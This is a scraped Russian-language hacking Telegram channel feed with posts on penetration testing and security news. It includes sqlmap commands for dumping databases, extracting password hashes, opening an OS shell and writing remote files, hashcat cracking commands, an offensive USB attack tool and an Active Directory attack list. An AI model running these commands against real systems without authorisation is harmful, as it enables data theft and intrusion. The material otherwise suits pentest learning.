Kali Linux
54.5K subscribers
1.06K photos
82 videos
13 files
1.1K links
@linux_kal наш чат

По всем вопросам- @workakkk

@ai_machinelearning_big_data - машинное обучение

@itchannels_telegram - 🔥 главные ресурсы для хакера

@programming_books_it - бесплатные it книги

@pythonl -🐍

РКН: clck.ru/3Fmszy
Download Telegram
🔐 Шпаргалка по использованию sqlmap

SQLMAP — это инструмент для проникновения с открытым исходным кодом.

SQLMAP позволяет автоматизировать процесс выявления и последующего использования уязвимостей SQL-инъекций и последующего получения контроля над серверами баз данных .

Кроме того, SQLMAP поставляется с механизмом обнаружения, который включает расширенные функции для поддержки тестирования на проникновение.

🌟 Базовый скан URL на наличие уязвимостей:

sqlmap -u "http://example.com/page.php?id=1"


🌟 Автоматический дамп всех баз данных:

sqlmap -u "http://example.com/page.php?id=1" --dbs


🌟 Извлечение таблиц из конкретной базы данных:

sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных --tables


🌟 Извлечение данных из конкретной таблицы:

sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных -T имя_таблицы --dump


🌟 Обход WAF (брандмауэра) с помощью указания пользовательского заголовка User-Agent:

sqlmap -u "http://example.com/page.php?id=1" --user-agent="Mozilla/5.0"


🌟 Подбор базы данных и получение информации о пользователях:

sqlmap -u "http://example.com/page.php?id=1" --current-db --current-user


🌟 Включение интерактивной оболочки (OS Shell) для удаленного выполнения команд:

sqlmap -u "http://example.com/page.php?id=1" --os-shell


🌟 Выполнение SQL-запросов вручную:

sqlmap -u "http://example.com/page.php?id=1" --sql-query "SELECT user, password FROM users"


🌟 Проверка на возможность подключения с правами администратора:

sqlmap -u "http://example.com/page.php?id=1" --is-dba


🌟 Брутфорсирование паролей пользователей:

sqlmap -u "http://example.com/page.php?id=1" --passwords


🌟 Загрузка файла на удаленный сервер:

sqlmap -u "http://example.com/page.php?id=1" --file-write="/path/to/local/file" --file-dest="/path/to/remote/file"


🌟 Получение списка столбцов из таблицы:

sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных -T имя_таблицы --columns


🌟 Использование прокси-сервера:

sqlmap -u "http://example.com/page.php?id=1" --proxy="http://127.0.0.1:8080"


🌟 Определение используемой базы данных и версии:

sqlmap -u "http://example.com/page.php?id=1" --banner


🌟 Атака на POST-запросы (если параметры передаются в теле):

sqlmap -u "http://example.com/login.php" --data="username=admin&password=admin"


@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6822🔥8🥰1
🔐 Hashcat — это мощный инструмент для взлома паролей с помощью методов перебора и атаки на хэши

🌟 Hashcat предустановлен на Kali Linux

💡 Вот небольшая шпаргалка по основным командам:

💻 Базовая команда:

hashcat [параметры] [хэши] [словарь/маска]

⚙️ Основные параметры:

-m — Тип хэша:

0 — MD5
100 — SHA-1
1400 — SHA-256
1800 — SHA-512
1000 — NTLM (Windows)

-a — Тип атаки:

0 — словарная атака
1 — комбинированная атака
3 — маска (брутфорс)
6 — словарь + маска
7 — маска + словарь
--help — выводит справку по командам и параметрам.

--show — показывает уже найденные пароли из предыдущих атак.

--status — показывает прогресс текущей атаки.

🔐 Примеры использования
Словарная атака (Dictionary Attack):

```shell
hashcat -m 0 -a 0 hashes.txt wordlist.txt```
-m 0 — указывает тип хэша (MD5).
-a 0 — указывает тип атаки (словарь).
hashes.txt — файл с хэшами.
wordlist.txt — словарь с возможными паролями.

🌟 Брутфорс по маске (Brute-Force Mask Attack):

hashcat -m 1000 -a 3 hash.txt ?d?d?d?d?d

?d — любая цифра (0-9).
Маска ?d?d?d?d?d — ищет 5-значные пароли (например, 12345).
Маски:

?d — цифры (0-9)
?l — строчные буквы (a-z)
?u — прописные буквы (A-Z)
?s — символы (!, @, #, и т.д.)
?a — любые символы

🌟 Комбинированная атака (Combination Attack):

hashcat -m 0 -a 1 hashes.txt wordlist1.txt wordlist2.txt

wordlist1.txt и wordlist2.txt — словари, которые комбинируются для подбора пароля.

🌟 Атака словарь + маска (Hybrid Attack):

hashcat -m 0 -a 6 hashes.txt wordlist.txt ?d?d

Применяет маску ?d?d к каждому слову из wordlist.txt. Например, password превратится в password00, password01, и т.д.

🌟 Использование собственного правила:

hashcat -m 0 -a 0 hashes.txt wordlist.txt -r rules/best64.rule

-r rules/best64.rule — применяет правила трансформации к каждому слову в словаре (например, добавление цифр или символов к слову)

https://www.kali.org/tools/hashcat/

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5617🔥5
🔐 Быстрый Совет дня: Как узнать, когда последний раз кто то входил в систему на этом устройстве?

Просто введите что то из этого:



$ last {имя}

🌟 Команда last покажет все входы в систему
🌟 Команда last Name покажет все входы в систему пользователя Name
🌟 Чтобы отобразить только несколько последних входов, используйте last | less

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5112🔥5😱4
🧅 ahmia.fi — мощная поисковая система в сети Tor

🌟 Ищет любые .onion ссылки.

🔗 Ссылка: *клик*

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍44🔥117
🕘 Timeshift — это инструмент восстановления системы для Linux, который схож по функциям с System Restore в Windows и Time Machine в macOS.

Он создан для защиты системных файлов путем создания последовательных снимков файловой системы с помощью rsync+hardlinks или снимков BTRFS через определенные промежутки времени.

Эти снимки могут быть использованы для отмены изменений в системе, если возникнет необходимость вернуться к предыдущему состоянию.

Важно отметить, что Timeshift работает именно с системными файлами и настройками, игнорируя личные данные пользователей, такие как документы и музыкальные файлы, которые сохраняются независимо от процесса восстановления системы.

sudo apt-get update
sudo apt-get install timeshift


🔗 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍496🔥6
🥷 Вредоносная программа для Linux под названием «perfctl» атакует серверы и рабочие станции Linux уже как минимум три года, оставаясь практически незамеченной благодаря высокому уровню уклонения и использованию руткитов

🌟 Основная цель perfctl — криптомайнинг, использование скомпрометированных серверов для добычи трудноотслеживаемой криптовалюты Monero. Однако его можно легко использовать для более разрушительных операций

🌟 При запуске perfctl открывает сокет Unix для внутренних коммуникаций и устанавливает зашифрованный канал с серверами злоумышленника через TOR, что делает невозможным расшифровку обмена.

🌟 Затем он устанавливает руткит под названием «libgcwrap.so», который подключается к различным системным функциям для изменения механизмов аутентификации и перехвата сетевого трафика по мере необходимости для облегчения обхода системы безопасности.

💡 Также развертываются дополнительные пользовательские руткиты, заменяющие утилиты ldd, top, crontab и lsof троянизированными версиями, что опять же препятствует прямому обнаружению активности вредоносного ПО.

🌟 Наконец, в систему устанавливается майнер XMRIG, который запускается для майнинга Monero с использованием ресурсов ЦП сервера

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥32👍147😱4
🔝 Awesome Sysadmin

Тщательно отобранный перечень ресурсов и инструментов, предназначенных для системных администраторов. Это очень удобный и практический перечень для админов.

В нем собраны различные утилиты для автоматизации процесса сборки, создания резервных копий, проверки кода и других задач.

Полный список доступен для ознакомления в репозитории:

Github

@linuxkalii
23👍12🔥2
Kali Linux - это дистрибутив, ориентированный на безопасность ... так что вы должны полностью доверять этому банкомату, не так ли? 😌

@linuxkalii
😁216👍27🔥107🤯5😱3
🔪 USBArmyKnife

Это идеальный инструмент для быстрого доступа для тестеров на проникновение и сотрудников red team.

Обладает широкими возможностями, включая атаки через USB HID, эмуляцию систем хранения данных, сетевые устройства и уязвимости Wi-Fi/Bluetooth (с использованием ESP32 Marauder).

Управляйте и развертывайте свои атаки без особых усилий, используя только телефон и удобный веб-интерфейс Bootstrap.

Вы даже можете просматривать экран жертвы через специальное Wi-Fi-соединение на устройстве.

Вооружитесь армейским ножом USB и поднимите свой набор инструментов для локального доступа на новый уровень.

Язык: JavaScript
Stars: 140 Issues: 6 Forks: 9

git clone https://github.com/i-am-shodan/usb-army-knife.git

Github

@linuxkalii
👍52🔥1513
🔐 Поисковые системы для пентестеров!

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥66👍206
⚡️ Обновления Firefox 131.0.2 и Tor Browser 13.5.7 с устранением критической уязвимости

Опубликованы корректирующие версии Firefox 131.0.2, Firefox ESR 115.16.1, Firefox ESR 128.3.1 и Tor Browser 13.5.7, которые устраняют критическую уязвимость (CVE-2024-9680).

Эта уязвимость приводит к выполнению вредоносного кода на уровне процесса обработки контента при посещении специально подготовленных веб-страниц.

Проблема связана с неправильным использованием освобожденной памяти (use-after-free) в реализации API AnimationTimeline, который используется для синхронизации и управления анимациями на веб-страницах.

Особенную опасность представляет тот факт, что компания ESET выявила случаи использования этой уязвимости в реальных атаках еще до выхода обновления (0-day). Подробности об уязвимости пока не разглашаются.

Также стоит отметить проблемы в версии Firefox 131, вызывающие нарушения в отображении элементов интерфейса при запуске браузера в окружениях на основе X11/Xorg без композитного сервера. В частности, могут исчезать тени и скругления всплывающих окон, а также может появляться черный фон вместо прозрачности на индикаторе прокрутки.

@linuxkalii
25👍17🔥6
⚡️ GOAD — одна из самых актуальных и самодостаточных тестовых инстурментов для пентеста окружения на базе Active Directory.

Главная цель — предоставить пентестерам уязвимую среду Active Directory, готовую к использованию для отработки основных атак, включая:

• Password reuse between computer (PTH)
• Spray User = Password
• Password in description
• SMB share anonymous
• SMB not signed
• Responder
• Zerologon
• Windows defender
• ASREPRoast
• Kerberoasting
• AD Acl abuse
• Unconstraint delegation
• Ntlm relay
• Constrained delegation
• Install MSSQL
• MSSQL trusted link
• MSSQL impersonate
• Install IIS
• Upload asp app
• Multiples forest
• Anonymous RPC user listing
• Child parent domain
• Generate certificate and enable ldaps
• ADCS - ESC 1/2/3/4/6/8
• Certifry
• Samaccountname/nopac
• Petitpotam unauthent
• Printerbug
• Drop the mic
• Shadow credentials
• Mitm6
• Add LAPS
• GPO abuse
• Add Webdav
• Add RDP bot
• Add full proxmox integration
• Add Gmsa и многие другие

🔗 Ссылка на GitHub
👍33🔥76😁1
🖥 Ставь палец вверх, если не знал!

#мем

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍248😁129🔥1812🤬5👎2🤯2
🥷 Киберпреступники взломали крупнейший архив мирового интернета!

💡 Киберпреступникам удалось взломать известный сайт Internet Archive, похитив данные 31 миллиона пользователей. В среду, 9 октября, на основном домене веб-архива появился всплывающий баннер с сообщением о «катастрофическом нарушении безопасности». Этот факт позже был подтверждён, а сам сайт перестал функционировать

🌟 Во всплывающем сообщении говорилось: «Чувствуете, что Internet Archive всегда был на грани катастрофического взлома? Что ж, это случилось. Ищите себя на HIBP!». Речь, судя по всему, шла о сайте Have I Been Pwned, известном в сфере безопасности ресурсом, предупреждающим о компрометации данных, что намекает на утечку огромного объёма пользовательской информации.

🌟 Эксперт по кибербезопасности Трой Хант, основатель HIBP, подтвердил факт взлома. Хакеры сами отправили ему базу данных объёмом 6.4 ГБ, содержащую информацию о 31 миллионе учётных записей, включая электронные адреса, имена пользователей и хешированные пароли. Пользователи могут проверить на HIBP, были ли они затронуты утечкой

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍20👎96😱5🔥2
А как называется такой вид кибератак?

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
😁62👍61🔥118🤔1🤩1
💡 Awesome browser exploit

Большой список полезных материалов по эксплойтам браузеров.

Эксплойты браузера описывают любую форму вредоносного кода, целью которого является манипулирование благими намерениями пользователя, что достигается за счет использования встроенных недостатков программного обеспечения.

Я только начинаю собирать то, что смог найти, и я только начинающий в этом деле.

⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.

Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍246🔥5
⚡️Легкий способ получать свежие обновления и следить за трендами в разработке на вашем языке. Находите свой стек и подписывайтесь:

МАШИННОЕ ОБУЧЕНИЕ: t.me/ai_machinelearning_big_data
C++ t.me/cpluspluc
Python: t.me/pythonl
Хакинг: t.me/linuxkalii
Devops: t.me/DevOPSitsec
АНАЛИЗ Данных: t.me/data_analysis_ml
Javascript: t.me/javascriptv
C#: t.me/csharp_ci
Java: t.me/javatg
Базы данных: t.me/sqlhub
Linux: t.me/linuxacademiya
Python собеседования: t.me/python_job_interview
Мобильная разработка: t.me/mobdevelop
Docker: t.me/DevopsDocker
Golang: t.me/Golang_google
React: t.me/react_tg
Rust: t.me/rust_code
ИИ: t.me/vistehno
PHP: t.me/phpshka
Android: t.me/android_its
Frontend: t.me/front
Big Data: t.me/bigdatai
Собеседования МЛ: t.me/machinelearning_interview
МАТЕМАТИКА: t.me/data_math
Kubernets: t.me/kubernetc


💼 Папка с вакансиями: t.me/addlist/_zyy_jQ_QUsyM2Vi
Папка Go разработчика: t.me/addlist/MUtJEeJSxeY2YTFi
Папка Python разработчика: t.me/addlist/eEPya-HF6mkxMGIy
Папка ML: https://t.me/addlist/2Ls-snqEeytkMDgy
Папка FRONTEND: https://t.me/addlist/mzMMG3RPZhY2M2Iy

😆ИТ-Мемы: t.me/memes_prog
🇬🇧Английский: t.me/english_forprogrammers
🧠ИИ: t.me/vistehno

🎓954ГБ ОПЕНСОРС КУРСОВ: @courses
📕Ит-книги бесплатно: https://t.me/addlist/BkskQciUW_FhNjEy
👍13🔥76